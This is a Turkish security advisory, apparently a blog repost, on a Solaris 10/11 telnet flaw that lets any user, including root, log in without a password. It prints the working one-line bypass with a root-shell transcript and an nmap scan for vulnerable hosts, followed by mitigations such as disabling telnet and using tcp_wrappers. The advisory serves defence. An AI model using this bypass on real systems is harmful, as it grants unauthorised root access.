Kaynak: http://www.fazlamesai.net/?a=article&sid=4447
***********************
Dün (12.02.2006) yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.
Güvenlik açığını nasıl test edersiniz?
Güvenlik açığını nasıl test edersiniz?
$telnet -l -fkullanici_adi hedef_sistem
fbsd~$ telnet -l -froot 10.1.1.1
Trying 10.1.1.1...
Connected to 10.1.1.1.
Escape character is '^]'.
[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]
Kerberos V5: mk_req failed (No such file or directory)
[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]
Kerberos V5: mk_req failed (No such file or directory)
Last login: Mon Feb 12 15:20:12 on console
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
root@solaris-test #
#nmap -sV -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"
1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.
Telneti kapatmak için
solaris-test# svcadm disable telnet
Adım Adım telnet ile sisteme root erişimini engellemek
/etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,Telnet servisine için tcp_wrapper desteği verilir
#inetadm -m telnet tcp_wrappers=TRUE
/etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.Huzeyfe ÖNAL - huzeyfe at enderunix.org
No comments:
Post a Comment